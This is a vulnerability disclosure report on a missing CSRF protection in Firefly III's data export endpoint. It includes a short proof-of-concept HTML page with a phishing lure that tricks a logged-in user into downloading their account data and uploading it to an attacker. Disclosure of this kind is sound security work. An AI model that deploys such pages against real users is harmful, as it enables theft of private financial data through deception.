Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid
Reported on Jun 2nd 2021

✍️ Description

The /export/export endpoint does not have CSRF Protection. This could be used to force download account data and potentially spoof users.

🕵️‍♂️ Proof of Concept

  • Login to user account.
  • Create the following file and open the page in browser.
// PoC.html
<html>
<body>
        To verify that you are a human, upload the file that has been downloaded from our website now.
        <a href="https://demo.firefly-iii.org/export/export">Download Test File</a>
</body>
</html>
  • This downloads user's data from the application without user's permission. An attacker can then spoof the user to upload this file into an attacker controlled server.

💥 Impact

Potential private information leakage through phishing by exploiting missing CSRF token.